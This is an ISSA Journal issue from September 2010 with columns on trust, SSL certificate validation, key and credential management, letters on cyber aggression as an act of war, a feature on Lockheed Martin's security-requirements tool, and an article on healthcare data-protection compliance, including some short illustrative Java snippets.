ISSA Journal – September 2010

 

Welcome to the September Journal

Thom Barrie – Editor, the ISSA Journal

 

I watched a movie the other night, one focusing on the U.S. military presence in Iraq. While it had a lot to say politically, and the action was non-stop, what really struck me was the ever-present network connectivity: there were laptops, desktops, and smartphones; real-time links between helicopters, ground forces, and headquarters. What was utterly apparent, especially from an InfoSec point of view, was the total dependency on C-I-A (the InfoSec triad, not the folks in dark glasses) on the battlefield.

Last issue I pointed out that the nation-on-nation question of cyber espionage/terrorism/aggression was rife within the pages of our Journal. While this month’s articles do not delve into that question, there have been a number of responses. See the “Letters and Discussions” on page 8. This continues to be a hot topic, one with deep ramifications.

Bil Bragg presents an interesting look at penetration testing – on civilian systems. What bothers me is the apparent simplicity of the attack vectors (the usual suspects), and while I would hope military-grade software has been thoroughly tested, software is software. And I wonder how often defense contractors “hurry” the product out the door to get it operational with the intent of fixing things as they come along. That may “work” in the commercial space, but not in the nation-on-nation space, where “mission-critical” applications spell life and death, where a breach can expose assets and a DoS can render a defender defenseless.

ISSA continues to be in the middle of the discussion. Let’s continue to raise the bar.

 –Thom

 

From the President

Hello ISSA members

Kevin L. Richards, ISSA International President

 

In just a couple weeks, the ISSA International Conference will convene in Atlanta, Georgia (September 15-18). The Conference Committee, the Chapter Leaders Congress Committee, and the ISSA headquarters staff have pulled together a world-class event that will combine great educational content, peer collaboration, information security executive briefings, and an opportunity to recognize the exemplary efforts of our member volunteers and contributors to our profession. If you haven’t had an opportunity to register, there is still time! Details can be found in the included Conference Guide as well as www.issaconference.org.

We will also be having our ISSA Annual General Membership Meeting on September 8. To better reach our global community, we will be meeting virtually. Invitations and meeting details have been sent to all members in good standing over the last couple of months. It is important to register, so if you haven’t done so, CLICK HERE for registration details. The goal of this meeting is to provide our members with a review of the ISSA’s activities over the last year and to discuss milestones and key events. And per our bylaws, the General Membership Meeting also provides for the transition from the exiting Board members to our newly elected volunteer leaders. Our new incoming Board members are Mary Ann Davidson, Steve Hunt, and Nils Puhlmann.

While I know I mentioned this last month, I wanted to once again recognize departing Board members Frederick Curry, Owen O’Connor, and Scott Williams for their contributions and tireless commitment to the ISSA. These three exemplify the spirit of our Association – we’re looking to find ways to keep them actively involved!

Looking forward and continuing as your ISSA International President, my next term will focus on a few guiding principles. Our efforts need to:

·      Help our members achieve their personal and professional goals

·      Maximize the value of being an ISSA member

·      Identify, develop, and expand forums for our members to collaborate and exchange ideas

·      Grow the brand and visibility of the ISSA internationally

·      Make the ISSA central and relevant to the debates that drive our profession

·      Capture the spirit, the passion, and the experiences of our members to guide the future generations of information security professionals

It is through these principles that we can grow from being a collection of chapters under a common name into a trusted global community that drives our profession and enriches the lives of our members.

One of the strengths of our community is the depth of professionals who volunteer for various ISSA activities. Our volunteers include chapter officers and committee members (see pages 10 and 27 for a list of members), meeting presenters, conference organizers, and those assisting at chapter meetings – there are many ways to contribute to the ISSA.

In closing, please join me in welcoming the newest ISSA chapters, Southern Tier of New York and Mountaineer (Fairmont, West Virginia).

I look forward to seeing you at the ISSA International Conference or at one of the upcoming events, and thank you for making the ISSA the pre-eminent, trusted, global information security community.   

– Cheers!
    Kevin

 

Columns _____________________________________

 

Sabett’s Brief

Trust: Everyone’s Killer App for Next Year?

By Randy V. Sabett – ISSA member, Northern Virginia, USA Chapter

 

A friend of mine recently sent me an email stating that Mars would appear as big as the Moon on August 27. She knew that my son and I enjoy astronomy. The next day, I got the “Sorry, just found out that was a hoax” email. It was a small reminder of the importance of former U.S. President Ronald Reagan’s famous line, “Trust, but verify.”

Trust is important in many verticals, including banking, law(!), and online commerce. The IT industry has been talking about it for years. In June, the government released the NSTIC (the National Strategy for Trusted Identities in Cyberspace). It mentions trust over 100 times. I now see many commentators talking about trust being the “killer app” of 2011 and, not unexpectedly, vendors jumping on board. I think back to the mid-90s and one of my colleagues saying, “Next year is the year of PKI and it’s always going to be that way.” Now, I’m not saying that trust will go the way of PKI as a potential application (after all, neither one really is an application), but I think it’s really important to realize that trust is not a binary concept. You cannot represent it solely with a bit (who recalls the X.509 “nonrepudiation bit” from the mid-90s?).

Instead, trust must be viewed as a summation of several different factors. These can include the security of the communications medium, the level and type of the transaction, any explicit mechanisms used to provide security, and the reputation and familiarity of the other party. Not all of these can be automated for every possible transaction. Even when automation of trust occurs, one must still be careful. The phishing and spearphishing attacks that have been launched over the years all rely on establishing misplaced trust.

The practice of law involves issues that usually present themselves as some shade of grey; very little is black and white, particularly in the areas of cyberlaw and data security law. Thus, I am very familiar with working on issues involving shades of grey. Doing so requires analysis and balancing of multiple sub-issues. The same is true with the concept of trust. Would you trust a vendor that you have never heard of and that has very little history in Internet transactions for the purchase of a $14,000 suite of specialized computer hardware and related software? How does the answer change if you started out with some $200 purchases of accessories and then a few $1900 purchases of specialized computers? What if you find that there are reputable independent ratings of the company?

On a personal note, I trust Internet vendors to differing degrees, depending on my own calculus. When searching for a new notebook a couple of years ago on an online marketplace that included a “feedback” rating for each seller, I came across a very good deal (but it wasn’t a stellar, unbelievable deal - those tend not to be trustworthy). I exchanged several emails with the seller, who had a very good feedback rating, but when I asked about payment methods, the response was “just wire us the money directly.” The emails then got progressively stranger (from “it’s a really good machine; wire us the money immediately or it may not be available” to “we are only a small shop and can’t accept credit cards” to “do you not trust us?”). I then talked to one of my forensic friends, who said that she was working with law enforcement on a crime ring whose pattern was to establish a good feedback rating over several years and then use that rating to defraud purchasers who trusted it when making bigger purchases. Thankfully, in that case I “trusted but verified”…and so should you in all of your dealings. The lesson here: do your diligence. Don’t be lazy. Take the time to check out the entities with whom you deal…and don’t just rely on the next killer app.

About the Author

Randy V. Sabett, J.D., CISSP, is the co-chair of the Internet & Data Protection (IDP) practice group at Sonnenschein Nath & Rosenthal LLP, an adjunct professor at George Washington University, and a member of the Commission on Cyber Security for the 44th Presidency. He may be reached at rsabett@sonnenschein.com.

 

 

 

Herding Cats

Trusting Trust

By Branden R. Williams – ISSA member, North Texas, USA Chapter

 

The business of information security simply does not work without trust. Trust in systems, trust in data, and trust in third parties are critical to making the entire information security ecosystem function well.

Truly secure systems are not always functionally effective. For example, one old information security adage is that the only secure computer is the one that doesn’t exist, or is encased in tons of concrete, or whatever you want to throw in there. Essentially, a computer that is totally secure won’t be very functional (if functional at all). Introduce the concept of trust, and while we cannot 100% eliminate a security threat, we can certainly get most of the way there and allow the machine to function.

The concept of trust allows the entire computing ecosystem to create centers of excellence around discrete areas of information security. For example, millions of people use one of the most visible signs of trust virtually every time they go online – the SSL-enabled web browsing session. As a user, I trust that when I go to my favorite website and enter data such as my payment card number to purchase goods and services, the website on the other end is actually what I think it is. Of course, we also use the session to encrypt and protect the data in transit, but one of the basic functions of SSL is to authenticate the site name as valid. A trusted third party, a Certificate Authority that is implicitly trusted by users, creates and signs a certificate that is loaded into the web server and matched with a private key. If everything checks out, you can trust that the server is what you think it is.[1]
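
To make that chain of trust a bit more concrete, here is a minimal Java sketch that opens an HTTPS connection and inspects the certificate chain the JVM’s default trust store has already validated during the handshake. The host name is purely illustrative, and the code is a demonstration of the idea rather than anything a browser actually runs.

```java
import javax.net.ssl.HttpsURLConnection;
import java.net.URL;
import java.security.cert.Certificate;
import java.security.cert.X509Certificate;

// Minimal sketch: connect over TLS and look at the certificate chain that the
// default trust store (the platform's list of trusted CAs) has already validated.
public class TrustCheck {
    public static void main(String[] args) throws Exception {
        URL url = new URL("https://www.example.com/");   // illustrative host only
        HttpsURLConnection conn = (HttpsURLConnection) url.openConnection();
        conn.connect();  // TLS handshake: the chain is checked against trusted CAs here

        for (Certificate cert : conn.getServerCertificates()) {
            if (cert instanceof X509Certificate) {
                X509Certificate x509 = (X509Certificate) cert;
                // The subject should correspond to the site we think we are talking to
                System.out.println("Subject: " + x509.getSubjectX500Principal());
                System.out.println("Issuer:  " + x509.getIssuerX500Principal());
                x509.checkValidity();  // throws if the certificate is expired or not yet valid
            }
        }
        conn.disconnect();
    }
}
```

If validation fails, the handshake itself throws an exception, the programmatic equivalent of the browser’s warning page.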

The system works well when everyone plays their part well.

What if we didn’t have trust? Imagine if you as a user had to somehow validate that the online store you were browsing actually belonged to the store at which you were shopping. Depending on the server’s or store’s location, I am sure some kind of travel would be required. Instead, you trust that a closed lock or green bar in your browser means you are safe.[2]

Diving deeper, we arrive at the concept of trusted computing. While largely developed by the Trusted Computing Group,[3] the concept itself could take certain elements that are considered open today, and close them down in a manner that would do more to eliminate viruses and malware than any antivirus vendor ever could. Imagine you could provide electronic copies of documents, and through a trusted computing infrastructure, demonstrate the non-repudiation required to prove without a shadow of a doubt that a certain person viewed, edited, accepted, and signed said documents – all electronically. Definitely sounds a little Big Brother to me, but depending on how it was implemented, it could be quite functional and efficient.

We can take certain elements of security for granted with trust. Provided we can demonstrate that the systems are operating within their limits and as predicted, we can assume that certain functions are handled for us.

Trust can also be used to protect intellectual property. With fully functional Digital Rights Management (DRM), it is conceivable that electronic information theft could be reduced or completely eliminated. Instead of remote hacking, we might see a resurgence of studies on compromising emissions, or TEMPEST. That would certainly change the landscape a bit to reinforce physical security and the use of Faraday cages to protect our information versus firewalls and antivirus. Granted, I am painting an extremist view of what the world could look like, but the reality is that the amount of investment and environmental change required to execute that vision is not practical for most businesses. It would need to be built into the systems we use today and in the future to be something we leverage as part of our overall IT strategy.

None of this, of course, would be possible without our little friend, trust.

About the Author 

Branden R. Williams, CISSP, CISM is the Director of the Global Security Consulting practice at RSA, the Security Division of EMC, and regularly assists top global retailers, financial institutions, and multinationals with their information security initiatives. Read his blog, buy his book, or reach him directly at http://www.brandenwilliams.com/.

 

 

Crypto Corner

Beyond Key Management

By Luther Martin – ISSA member, Silicon Valley, USA Chapter

 

Encryption can provide essentially unbreakable security, but it provides security that is only as strong as the key management that supports it. Key management, in turn, is only as strong as the credentials used to authenticate users, and weak credential management can undermine the strength of key management just as easily as weak key management can undermine the strength of encryption. In either case, the protection provided by encryption can be reduced from being essentially unbreakable to being very weak.

But while it is fairly well known these days that strong key management is needed for encryption to be strong, the fact that strong credential management is needed for key management to be strong is not as widely understood. Let’s take a first step towards changing this.

Key management

A cryptographic key is much like the combination to a safe: if you have the right combination, it is easy to open a safe, but it is hard to open one without it. Similarly, if you have the right cryptographic key, decrypting encrypted data is easy, but decrypting it is impractical without this key.

If you are careless enough to let someone else learn the combination to your safe, however, the protection provided by the safe is compromised. Similarly, cryptographic keys need to be handled carefully. If you are careless with them, then the protection provided by encryption can be essentially eliminated. Key management covers all the details of how to ensure that this does not happen, including how to securely generate, transport, store, use, and destroy keys. It ensures that you do not do the cryptographic equivalent of writing the combination to your safe on a Post-it™ note and sticking it to the wall next to your desk.
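
For readers who want to see the “generate” step in code, here is a minimal Java sketch that creates a key from a cryptographically strong random source instead of hardcoding one. The algorithm and key size are illustrative choices for the example, not a recommendation from any particular standard.

```java
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import java.security.SecureRandom;

// Minimal sketch of the "generate" step of key management: the key comes from a
// strong RNG, never from a constant or a password pasted into source code
// (the digital equivalent of the Post-it note on the wall).
public class KeyGen {
    public static void main(String[] args) throws Exception {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(256, new SecureRandom());          // 256-bit key from a strong random source
        SecretKey key = kg.generateKey();

        // In practice the key would now go to an HSM or a key management service,
        // never into source control or a cleartext configuration file.
        System.out.println("Generated an AES key of " + key.getEncoded().length * 8 + " bits");
    }
}
```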

But even if you have robust key management, it is still possible to have weak security. Part of using cryptographic keys securely is ensuring that they are only given to authorized users. If an adversary can masquerade as an authorized user, he can get keys as easily as an authorized user can, so it is also important to securely manage the authentication credentials that the key management system uses.

Credential management

A useful analogy for credential management is with identity theft. If a hacker can steal your identity, then for all intents and purposes he is you: he can open fraudulent bank accounts in your name, buy a house or car in your name, etc. Similarly, in an enterprise computing environment, if a hacker can get the authentication credentials for an authorized user of a key management system, then he can get keys just as easily as the authorized user can.

Unfortunately, existing key management standards (including draft standards) do not address the issue of credential management. They assume authentication takes place to ensure that keys are only granted to authorized users, but they do not specify how to do this securely. This means that it is possible to fully comply with the best practices that key management standards define yet still have minimal security.

More than just encryption

Note that the strength of credential management limits the strength of technologies other than encryption. If you are using tokenization to eliminate cardholder data from your systems, for example, then the security provided by the tokenization is limited by the strength of the authentication credentials that the tokenization system uses. If a hacker can authenticate as an authorized user to the tokenization system then he can easily convert a token back into the plaintext data that it represents. If this happens, the security provided by the tokenization is essentially eliminated.
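
As a rough illustration of why credential strength bounds tokenization strength, consider the toy token vault sketched below. The class, the token format, and the credential check are invented for this column and do not represent any vendor’s product.

```java
import java.security.SecureRandom;
import java.util.HashMap;
import java.util.Map;

// Toy token vault: it will only detokenize for an "authorized" caller. If an
// attacker obtains a valid credential, the vault happily returns the plaintext,
// which is exactly why credential management limits the strength of tokenization.
public class TokenVault {
    private final Map<String, String> tokenToPlain = new HashMap<>();
    private final SecureRandom random = new SecureRandom();

    public String tokenize(String pan) {
        String token = "tok-" + Long.toHexString(random.nextLong()); // no mathematical relation to the PAN
        tokenToPlain.put(token, pan);
        return token;
    }

    public String detokenize(String token, String credential) {
        if (!isAuthorized(credential)) {
            throw new SecurityException("caller not authorized to detokenize");
        }
        return tokenToPlain.get(token);
    }

    // Placeholder check: in a real system this would call the enterprise
    // authentication service, and its strength bounds the strength of the vault.
    private boolean isAuthorized(String credential) {
        return "valid-service-credential".equals(credential);
    }

    public static void main(String[] args) {
        TokenVault vault = new TokenVault();
        String token = vault.tokenize("4111111111111111");     // sample card number
        System.out.println("Stored token: " + token);
        System.out.println("Detokenized:  " + vault.detokenize(token, "valid-service-credential"));
    }
}
```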

So just like it does not make sense to accept that encrypted data is safe without looking more closely at the security of the supporting key management, it does not make sense to accept that tokenization is secure without looking at the security of the supporting credential management. With both technologies, the security provided by a complete data protection solution is limited by system-level issues instead of the technologies themselves; and to ensure that sensitive data is protected, those are the issues that need to be addressed.

Because of this, information security professionals should focus their efforts on ensuring that credential management and key management are done securely and worry less about arcane arguments about the strength of encryption algorithms or the security of tokenization schemes. That is the best way to ensure that sensitive data gets the protection that it needs.

About the Author

Luther Martin is the Chief Security Architect for Voltage Security. You can find his daily thoughts on information security at http://superconductor.voltage.com and can reach him at martin@voltage.com.

 

Letters & Discussions

To the Editor

When does Electronic Espionage or Cyber Attack Become an “Act of War”?

The problem with David Willson’s article in the August ISSA Journal is that it presumes “war” means the same thing in cyberspace as in real space, and it focuses on the possibility of cyber events causing armed response and conflict.

I propose that acts of aggression in cyberspace should be characterized outside of war in its traditional definition. They are closer to real-space “terrorism” and “piracy.” There are no nation-states in cyberspace, and both terrorists and pirates act outside the bounds and intent of nation-states. While there are citations showing how countries have been attacked, the attacks are essentially economic (similar only to a “cold war”). We need to define a term for this: cyber terropirates?

More to the author’s point, international law needs to change to encompass cyber aggression within piracy, for example. The piracy issue is addressed by international task forces. Would not cyber-piracy (on the order of an act of aggression) also warrant international task forces?

A few points:

·      Cyberwar is not warfare; it is closest to piracy. We need a definition and a term.

·      If there is no standard for this in U.S. or international law, then existing statutes should be extended (possibly the “law of the sea” regarding piracy) to encompass these cyber acts of aggression (the cyber-piracy-terror thing). Think of creating a common “law of the cyberseas.”

·      The result would be manifold: definition, understanding, international patrolling/response (like the joint task forces patrolling off Somalia), and deterrence of nation-states from armed retaliation to cyber aggression.

Brett Osborne, CISSP+CISM
ISSA Member, Central Florida, USA Chapter
itdefpat@gmail.com

 

Brett, I agree in part.  

Cyberspace has created many unique situations and scenarios. I agree with characterizing it as cyber terrorism or piracy, but strictly when the actors are sole actors or non-state actors. The consensus is that the attacks on Georgia and Estonia, among others, were carried out by or at least condoned by the Russians. If it is state on state, then it could quite possibly be an act of “war,” or more appropriately an act of aggression under international law, allowing the victim nation to strike out in self-defense. Additionally, many nations, including the U.S., have incorporated or are incorporating cyberspace attacks and weapons or tools into their military arsenals. It makes a lot more sense to disrupt or deny your opponent’s early warning, weapons, or communications systems prior to any conflict, thus gaining the upper hand. So the distinction is whether the person or persons attacking are terrorists, criminals, or state actors, which raises one of the issues I covered in the article: the difficulty of attribution in cyberspace is what makes it so attractive to many and so frustrating to most victims. I guess I could have made more of a distinction in the article between the various types of “bad actors” in cyberspace. Thank you for the comment, very insightful.

Concerning international cyberspace, please see my article, “A Global Problem: Cyberspace threats demand an international approach,” ISSA Journal, August 2009.

David Willson
ISSA member, Colorado Springs, USA Chapter
willson.david.l@gmail.com.

 

 

Feature Article

 

Cybersecurity Engineering: The Requirements Tool Advantage

By Jeff Fenton, ISSA member, Silicon Valley, USA Chapter and Richard Tychansky

 

This article shows how an organization can benefit from making security requirements accessible through a custom web application to Information Assurance Engineers, System Engineers, Application Developers, and Internal Auditors.

 

Abstract 

Compliance with the requirements of an organization’s cybersecurity policy framework is the basis for building trusted systems and applications. This article shows how an organization can benefit from making security requirements accessible through a custom web application to Information Assurance Engineers, System Engineers, Application Developers, and Internal Auditors. The tool advantages are faster requirements search and allocation, requirements traceability to external standards (e.g., ISO 27001 and NIST SP 800-53, Rev 3), and real-time alignment to organizational policy. The tool and process have been developed in-house and are being applied successfully at Lockheed Martin Corporation.

 

An organization’s policies provide a strong foundation for trust. Cybersecurity policies provide the foundation for information security governance by enabling security program development and management. They also constitute the basis for establishing both risk management and compliance measurement frameworks to meet business needs. Importantly, they provide detailed requirements that must be allocated to the development of systems and applications. Security requirements reflect an organization’s response to relevant sector-based laws, regulations, industry standards (e.g., ISO 27001[4] and NIST SP 800-53[5]), best practices, and common security vulnerabilities and exposures. The requirements become reusable project components, which support the IT value proposition of “building security in.”

Traditionally, though, the problem has been that to build security into a system or application an engineer needed to be aware of the organization’s cybersecurity policy requirements. As the regulatory landscape and threat level changed, so did the requirements. An application interface to the policy-making environment is needed to provide engineers the ability to extract and collate relevant, current requirements. This would advance the organization’s system development process to help build business trust to the level where it becomes a competitive advantage. Lockheed Martin developed in-house and deployed a requirements management tool and process to promote building security in.

Cybersecurity policy foundations

IT governance for an organization must include cybersecurity policies in order to maintain customer trust and regulatory compliance. Where is the appropriate place in an organization’s policy hierarchy to place cybersecurity policies so they would apply to all business areas and not be focused upon a single business element?

A typical policy hierarchy may include high-level Corporate Policy Statements (CPS), more detailed Corporate Functional Procedures (CFP) applying to the entire organization, and finally discrete Business Area/Business Unit policies (Figure 1). The application of policy is top-down (i.e., CPS to CFP to Business Area/Units). Policy supplements by Business Area/Units do not flow back up the hierarchy or laterally across to other business areas, because of the need to maintain IT governance stability and accountability at the top level of the organization.

Top-level CPS statements represent senior management’s overall commitment to build trust in the organization and include the conceptual foundation for cybersecurity in the organization. Specific cybersecurity policies are then implemented as a Corporate Functional Procedure called the Corporate Information Protection Manual (CIPM). Notably, the CIPM can also be referenced by the Business Areas/Units and be supplemented with additional requirements (i.e., security controls) to establish or maintain a specific business information assurance objective (i.e., confidentiality, integrity, and/or availability). The CIPM enables trust by providing a baseline of specific security control requirements for information systems and applications. The CIPM is comprised of three unique policy objects: Directives, Standards, and Guidelines (Figure 2).

High-level requirements in the form of directive statements are focused on key information security objectives for the organization. Standards contain detailed requirements for various information security topics under each of the directive statements. Together with the directive statements, standards present issue-specific policy on the topic areas. Guidelines are advice, recommendations, and best practices. Guidelines can include recommended alternative methods for meeting requirements.

The CIPM Security Policy Framework (SPF) has been shown to align to ISO 27001 and NIST SP 800-53, Revision 3 security control objectives and requirements. CIPM policy mappings have supported ISO 27001 certification and an assessment of the CIPM for control gaps when compared to NIST SP 800-53, Revision 3.

When initially implementing the CIPM SPF, all supporting policy artifacts were imported into a requirements management tool. This tool then formed the basis for the development of a Security Policy Management System (SPMS). Each directive became a top-level requirement, with child requirements for directive statements. Each directive statement then has one or more standards and/or guidelines as child requirements. Each standard itself also has child requirements, and likewise each guideline has similar child requirements for advice and recommendation statements. Records in the SPMS were created for additional supporting artifacts (supplementary documents, forms, and figures) which are associated with standards and guidelines.

Within the SPMS, each policy object has attributes including effective date, last reviewed date, status (draft or approved), role metatags (system administrator, database administrator, network administrator, system engineer, etc.), topic metatags (email, firewalls, passwords, routers, etc.), and change history. Each policy object also includes any applicable traceability to external standard requirements (e.g., ISO, NIST, and industry specific standards such as PCI DSS[6]).
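
As an illustration only, a policy object carrying those attributes might be modeled along the following lines in Java. The type and field names are assumptions made for the sketch, not Lockheed Martin’s actual SPMS schema.

```java
import java.util.Date;
import java.util.List;

// Hypothetical sketch of a single SPMS policy object and its attributes.
public class PolicyObject {
    public enum Type { DIRECTIVE, STANDARD, GUIDELINE }
    public enum Status { DRAFT, APPROVED }

    private String id;
    private Type type;
    private Status status;
    private Date effectiveDate;
    private Date lastReviewedDate;
    private List<String> roleMetatags;          // e.g., "system administrator", "network administrator"
    private List<String> topicMetatags;         // e.g., "email", "firewalls", "passwords", "routers"
    private List<String> externalTraceability;  // e.g., references to ISO 27001 or NIST SP 800-53 controls
    private List<String> changeHistory;

    // Getters and setters omitted for brevity.
}
```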

A formal Information Security Policy Development Process (IS-PDP) (Figure 3) was implemented to facilitate updates to the CIPM and ensure that policy changes are captured in the SPMS. The entire process for a policy change typically takes 12 weeks, and can be accelerated to support more time-sensitive business needs. Each IS-PDP phase takes approximately 1-2 weeks; drafting can take 2-4 weeks or longer depending upon the complexity and involvement of Subject Matter Experts (SMEs).

The organization’s Corporate Information Security (CIS) group works closely with the CIPM Change Review Board (CRB), which includes representation from each Business Area (BA) within the organization. Each BA has an Information Security Officer (BA ISO). The BA ISOs are the advocates for CIPM change and evolution to ensure risk is addressed appropriately for their business areas. Employees in each BA are encouraged to contribute CIPM Change Requests (CRs) to their respective BA ISO.

CRs are typically submitted to an intranet collaboration website where they are then assigned a tracking identifier for referencing comments and work products. The BA ISOs and their respective constituents participate in CR reviews before any proposed CIPM change is formally accepted. Reviews of any new cybersecurity requirement will consider the business need to balance risk and operational impact.

The policy development process engages stakeholders and balances risks and benefits to deliver policies that realistically support business needs. Sound policies, easily understood and readily applied, help to build trust by customers, system users, and across the supply chain. Customers are more confident in the organization’s ability to deliver when policy builds the foundation for a quality process. While policies often sit on a shelf, the CIPM SPF makes them readily accessible, easily usable, and an integral part of the business.

Building the CIPM iQ interface

A static view of corporate policies and functional procedures is not conducive to search and allocation of requirements for specific projects. A static view can also become outdated and introduce risk to projects. To further enhance the value of policy, policy users need an interface to the requirements; thus, an additional web application was envisioned to facilitate building security into systems and applications with a dynamic view of policy. The need for system engineers and application developers to build compliant solutions for customers led the CIS group to build a custom web application to interface directly with the CIPM Security Policy Management System (SPMS).

The tool is named CIPM InfoQuery (iQ) and is an internally developed web application using Java Server Pages (JSP) technology[7] to create the dynamic presentation layer views of cybersecurity policy. Java servlets were used for the business layer and an SQL database for the persistence layer.

CIPM policy objects are accessed by the Java application directly through an API call to the SPMS rather than by direct queries to the policy requirements management system. The data is then converted to Java objects and saved on the web server in XML format. An overview of the system architecture is given in Figure 4.
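
The article does not say which XML binding the team used, but as a sketch of the “convert to Java objects and cache as XML” step, something along the lines of the following JAXB example would serve. The class name, fields, and file name are invented for illustration.

```java
import javax.xml.bind.JAXBContext;
import javax.xml.bind.Marshaller;
import javax.xml.bind.annotation.XmlRootElement;
import java.io.File;

// Illustrative sketch: marshal a policy object retrieved from the SPMS into an
// XML file cached on the web server for the presentation-layer views.
public class PolicyExport {

    @XmlRootElement
    public static class PolicySnapshot {
        public String id;
        public String title;
        public String status;
    }

    public static void main(String[] args) throws Exception {
        PolicySnapshot p = new PolicySnapshot();    // in reality populated from the SPMS API call
        p.id = "STD-001";
        p.title = "Password standard";
        p.status = "approved";

        JAXBContext ctx = JAXBContext.newInstance(PolicySnapshot.class);
        Marshaller m = ctx.createMarshaller();
        m.setProperty(Marshaller.JAXB_FORMATTED_OUTPUT, Boolean.TRUE);
        m.marshal(p, new File("policy-STD-001.xml"));   // cached copy read by the JSP views
    }
}
```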

The architecture supports two views of the organization’s cybersecurity policy: one static, the published policy (Command Media) view; the other dynamic, CIPM iQ. Now, when a policy update is published, it is available in real time to system engineers as discrete, searchable policy objects, which can then be allocated to requirements collections for projects.

Users can create collections of requirements with the “My iQ” feature of CIPM iQ. Team members can now take action on being accountable for compliance by contributing to a project’s requirements collection. Collections can be shared with a project team and rights can be assigned to view, edit, and update the security requirements package.

The CIPM iQ requirements tool advantage

CIPM iQ has proven to be an effective tool for system security engineers and internal auditors when they need to quickly identify the cybersecurity compliance requirements for projects. Each CIPM requirement is written in proper system engineering style, ready for engineers to apply and “build security in” to systems. The organization’s Global Supply Chain Management and Legal teams also realize an advantage when referencing the tool to help them define contractual requirements with business partners. CIPM iQ makes cybersecurity policy accessible to everyone in the organization, which promotes awareness of the organization’s compliance requirements. The interface (Figure 5) is user-friendly and supports basic and advanced searches, as well as the more advanced collections feature.

CIPM iQ leverages the security policy framework, including the use of metatags for each policy object (see the “Subject Index” in Figure 5). The tool also enables users to search based on document type (i.e., directive, standard, or guideline) and on any keyword within a policy object.

Conclusion

“Building security in” is an engineering paradigm that is applied to the design of information systems and applications. With the deployment of a custom web-based application (CIPM iQ), cybersecurity requirements are searchable and are more easily allocated to programs/projects throughout any phase of the System Development Life Cycle.

The business advantages of creating CIPM iQ to support cybersecurity requirements compliance are that it:

·      Demonstrates to external customers and partners that the organization has established an effective end-to-end organization-wide information security management system

·      Enables efficient management of dynamically changing cybersecurity requirements

·      Enables project compliance assessments by auditors

·      Enables compliance assessments across multiple security standards

Future enhancements for the tool will be based upon an analysis of security engineering and project management use cases. The tool is envisioned to support standard engineering process improvement by allowing for the reuse of common controls for the organization as well as supporting automated compliance efforts to reduce the cost of engineering trusted systems and applications.

About the Authors

Jeff Fenton, CISSP, ISSEP, ISSMP, CISM, GBLC, CBCP, is a Sr. Staff Information Assurance Engineer with Lockheed Martin’s Corporate Information Security organization. His responsibilities include corporate cybersecurity policy and standards. He may be reached at jeff.fenton@lmco.com.

Richard Tychansky, PMP, CISSP, ISSEP, CSSLP, CAP, CISA, CISM, CGEIT, CRISC, CRMP, has over 15 years of experience assessing and managing risk in cybersecurity programs. Currently, he is shaping cybersecurity policy evolution at Lockheed Martin Corporation by leading an alignment to NIST and ISO/IEC standards. He may be reached at richard.s.tychansky@lmco.com.

 

 

 

Information Protection Framework: 

Data Security Compliance and Today’s Healthcare Industry

By Bindu Sundaresan and Carisa Brockman

 

Today’s healthcare industry is facing complex privacy and data security requirements. This article shows that organizations must be equipped with an information protection strategy that is inclusive of security, privacy, and risk management solutions.

 

Abstract

Today’s healthcare industry is facing complex privacy and data security requirements. The movement from paper to digital records of health information is accelerating, making it ever more important that information be protected. Organizations must be equipped with an information protection strategy that is inclusive of security, privacy, and risk management solutions.

 

Over the last several years, a number of laws and regulations have been adopted which impact the use of information in the healthcare industry.[8] The Health Information Technology for Economic and Clinical Health Act (HITECH), part of the American Recovery and Reinvestment Act of 2009 (ARRA), was signed into law with the goals of developing a healthcare IT infrastructure, encouraging entities to adopt Health Information Technology (HIT) and “meaningfully use” Electronic Health Records (EHRs), and protecting the privacy of the consumer.

ARRA also modified the Health Insurance Portability and Accountability Act (HIPAA) in several ways: it made portions of HIPAA directly applicable to Business Associates; it gave patients broader rights to an accounting of disclosures, including those for Treatment, Payment, and Operations (TPO); it modified and expanded obligations for breach notifications, both by Covered Entities and Business Associates; it strengthened the privacy rights of patients; and it gave certain federal and state entities greater authority over compliance and enforcement.

This legislation and associated regulations require affected entities to do a variety of things, such as:

·      Review and potentially modify their privacy and security policies

·      Implement and update employee training programs

·      Develop breach notification protocols

·      Maintain and follow internal audit plans

·      Modify existing data sharing arrangements that are no longer permissible

·      Be prepared for external audits

Healthcare information flows

The flow of healthcare information follows the patient, from the doctor’s office to laboratories, imaging centers, pharmacies, and other care facilities (Figure 1). This natural flow of medical records provides many points where information security must be considered and proper processes implemented.

The increasing interconnection, while extremely beneficial for patient healthcare, also raises risks related to patient privacy and confidentiality. There is heightened consumer awareness regarding the privacy of sensitive information, and the potential impact of reported data breaches has led consumers to expect and demand protection of their personal health information.

As healthcare operations benefit from advancing technologies which promote information sharing, it is necessary to build and use the appropriate information protection framework to preserve the integrity and protect the confidentiality of Protected Health Information (PHI) and Personally Identifiable Information (PII).

Health information protection framework

To enable effective and secure information sharing, healthcare organizations require a transparent, consistent ability to identify information sensitivity and determine proper handling. This is achieved by developing an information protection strategy and framework that is comprehensive, but flexible enough to meet changes in healthcare infrastructure while achieving compliance requirements. As many organizations have learned, focusing on one set of compliance requirements at a time does not assist in building a comprehensive framework or strategy; it only increases the amount of time and resources which organizations have to spend on meeting requirements.

The information protection strategy/framework should look at a broad set of protection requirements including specific internal security and privacy requirements, risks to the business, applicable compliance requirements, and industry standards (Figure 2).

Risk management: Integral to security and compliance 

Under the HIPAA security rule, healthcare organizations are required to conduct periodic risk assessments to identify data security risks and implement appropriate security controls for their particular organization. The resources provided by the Department of Health and Human Services (HHS) are a good starting point.

Healthcare organizations must perform ongoing risk assessments to identify the risks that could compromise their data and determine what the potential effects of the risk could be, based upon the environment in which they operate.[9] This can guide healthcare organizations in making intelligent and informed decisions about how to allocate security resources to protect customer or patient data and ensure compliance.

Adopt a well-defined risk assessment framework that can help you identify and address the risks that are pertinent to your organization.

Risk assessment in general has many definitions in the industry today. Some view risk assessment as merely a checklist/questionnaire and consider it to be a one-time effort. Others have a deeper view of risk assessment and consider it to be a useful tool in identifying the controls that need to be put in place to maintain the security posture of the organization. In today’s business operations, where information is critical to the success of a business, a solid risk assessment framework must be in place in order to help with efficient risk management.

Risk in this context can be defined as the impact and likelihood of an adverse event. With respect to healthcare data, the impact and likelihood of an adverse event depends on the amount and sensitivity of the health information and the number of people or systems having access to that information. For example, an individual physician’s office with one system, not connected to a network storing sensitive health information, creates less exposure and decreases the risk of the information being compromised, while a large medical provider with an extensive health information exchange infrastructure and various members accessing and handling the information creates a greater risk of the information being compromised.
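
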